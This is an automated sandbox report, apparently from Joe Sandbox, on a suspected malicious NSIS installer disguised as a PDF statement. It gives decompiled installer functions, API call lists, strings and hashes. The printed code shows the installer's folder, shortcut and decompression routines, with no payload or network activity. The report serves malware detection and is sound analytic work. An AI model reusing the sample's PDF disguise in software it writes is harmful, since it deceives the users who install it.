Snapshot File: hcaresult_0_2_6ed60000_ekstre_pdf.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 6a3ad65d72f584be00f850b973111f83fd375d04472eecc7ddda8c31a1941c07
Instruction ID: 2a644e39a74b5ba3b6e21a5d4c18e49307d789e818a3a4ef16c873efa6bd0806
Opcode Fuzzy Hash: 6a3ad65d72f584be00f850b973111f83fd375d04472eecc7ddda8c31a1941c07
Instruction Fuzzy Hash: 5DB012B02044009FFF808B14DC1AF303354F702704F000000F600D5041C1248C028534

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040498A Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x448240; // 0x66d114
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xe) + 0x47c000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x440238, _t146);
							_t87 = E0040690A("true");
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x440238, _t146);
								_t89 = E00405EB7(0x440238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x440238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x440238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x440238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x440238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x440238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x472edc + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x440228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x47afa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x450258 == _t158) {
									E004048E3();
								}
								 *0x450258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x450268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x450268, _t167, 0x444240, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x47af10 + 0x11c));
								if( *((intOrPtr*)( *0x47af10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme") {
									E0040657A(_t146, 0x450268, _t167, 0, _t125);
									if(lstrcmpiW(0x46aea0, 0x450268) != 0) {
										lstrcatW(_t146, 0x46aea0);
									}
								}
								 *0x450258 =  *0x450258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x472ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push("true");
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, "true");
						goto L8;
					}
				}
			}

0x0040498a
0x00404990
0x00404996
0x004049a3
0x004049b1
0x004049b4
0x004049bc
0x004049c2
0x004049c2
0x004049ce
0x004049d1
0x00404a3f
0x00404a46
0x00404b1d
0x00404b24
0x00404b33
0x00404b33
0x00404b37
0x00404b41
0x00404b4e
0x00404b50
0x00404b50
0x00404b5e
0x00404b65
0x00404b6c
0x00404b6f
0x00404bab
0x00404bad
0x00404bb3
0x00404bb8
0x00404bbc
0x00404bbe
0x00404bbe
0x00404bda
0x00000000
0x00404bdc
0x00404bdf
0x00404bed
0x00404bf3
0x00404bf4
0x00404bf7
0x00404bfa
0x00000000
0x00404bfa
0x00404b71
0x00404b73
0x00404b77
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b79
0x00404b79
0x00404b86
0x00404b8b
0x00000000
0x00000000
0x00404b8f
0x00404b91
0x00404b91
0x00404b9a
0x00404b9c
0x00404ba1
0x00404ba4
0x00404ba9
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ba9
0x00404c06
0x00404c10
0x00404c13
0x00404c16
0x00404c1d
0x00404c1d
0x00404c1f
0x00404c1f
0x00404c24
0x00404c26
0x00404c2e
0x00404c35
0x00404c37
0x00404c42
0x00404c42
0x00404c37
0x00404c52
0x00404c5c
0x00404c64
0x00404c7f
0x00404c66
0x00404c6f
0x00404c6f
0x00404c64
0x00404c84
0x00404c89
0x00404c8e
0x00404c97
0x00404c97
0x00404ca0
0x00404ca2
0x00404ca2
0x00404cae
0x00404cb6
0x00404cc0
0x00404cc0
0x00404cc5
0x00000000
0x00404cc5
0x00404b6f
0x00404b26
0x00404b2d
0x00000000
0x00000000
0x00000000
0x00404b2d
0x00404a4c
0x00404a55
0x00404a6f
0x00404a74
0x00404a7e
0x00404a85
0x00404a91
0x00404a94
0x00404a97
0x00404a9e
0x00404aa6
0x00404aa9
0x00404aad
0x00404ab4
0x00404abc
0x00404b16
0x00404abe
0x00404abf
0x00404ac6
0x00404ad0
0x00404ad8
0x00404ae5
0x00404af9
0x00404afd
0x00404afd
0x00404af9
0x00404b02
0x00404b0f
0x00404b0f
0x00404abc
0x00000000
0x00404a74
0x00404a62
0x00000000
0x00000000
0x00404a68
0x00000000
0x004049d3
0x004049e0
0x004049e9
0x004049f6
0x004049f6
0x004049fd
0x00404a03
0x00404a0c
0x00404a0f
0x00404a12
0x00404a1a
0x00404a1d
0x00404a20
0x00404a26
0x00404a2d
0x00404a34
0x00404ccb
0x00404cdd
0x00404a3a
0x00404a3d
0x00000000
0x00404a3d
0x00404a34

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049D9
SetWindowTextW.USER32(00000000,?), ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32(Call,00450268,00000000,?,?), ref: 00404AF1
lstrcatW.KERNEL32(?,Call), ref: 00404AFD
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00002000,00404B46), ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,759D3420,004E0000,?,00403508,004E0000,004E0000,00403810), ref: 00406827
Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,004E0000,004E0000,00403810), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?,00000000,759D3420,004E0000,?,00403508,004E0000,004E0000,00403810), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?,759D3420,004E0000,?,00403508,004E0000,004E0000,00403810), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(00440238,?,?,0000040F,?,00440238,00440238,?,?,00440238,?,?,000003FB,?), ref: 00404BD2
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(00450268,00450268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,00450268), ref: 00404E03

Strings

A, xrefs: 00404AAD
Call, xrefs: 00404AEB, 00404AF0, 00404AFB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme, xrefs: 00404ADA

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme$Call
API String ID: 2624150263-341133336
Opcode ID: d6eef814b5a7d02e14053a7422bde2a7831e923c1d1af72841be61d732072e9a
Instruction ID: 0a130a5a836d5b774b6e20effed70c450752cc08f381d55ec62788ce6377305c
Opcode Fuzzy Hash: d6eef814b5a7d02e14053a7422bde2a7831e923c1d1af72841be61d732072e9a
Instruction Fuzzy Hash: 30A181B1900208ABEB11AFA5DD45AAFB7B8EF84314F10813BF601B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, "true", 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme\\Eksamenskvotientens144\\Nephrosclerosis\\Dingwall");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), "true");
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004085F0,?,?,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens14, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dialectical\Kombinationsuddannelserne\Chronogramme\Eksamenskvotientens14
API String ID: 542301482-3015494402
Opcode ID: 9b66753cc977f42c6e26dab213f787e631a4d81bb9025f03c6424c01116dbae7
Instruction ID: f38153a8b94c021b5a8a3ddb59ea47682db372bf124b9a544b9002f4e51b460a
Opcode Fuzzy Hash: 9b66753cc977f42c6e26dab213f787e631a4d81bb9025f03c6424c01116dbae7
Instruction Fuzzy Hash: 9F410571A00208EFCF40DFE4C989E9D7BB5BF49344B20456AF905EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 95d43a37da8a7b8688081d1e3d2738ba0eb7e109d0b17c2db19f04da6669d4e6
Instruction ID: ce1145ebe30bc4d5edb044e2df7aa7b58c3ee3cdcc7e89ea14076b766ffdb42b
Opcode Fuzzy Hash: 95d43a37da8a7b8688081d1e3d2738ba0eb7e109d0b17c2db19f04da6669d4e6
Instruction Fuzzy Hash: 01F08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E559B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00406D85 Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
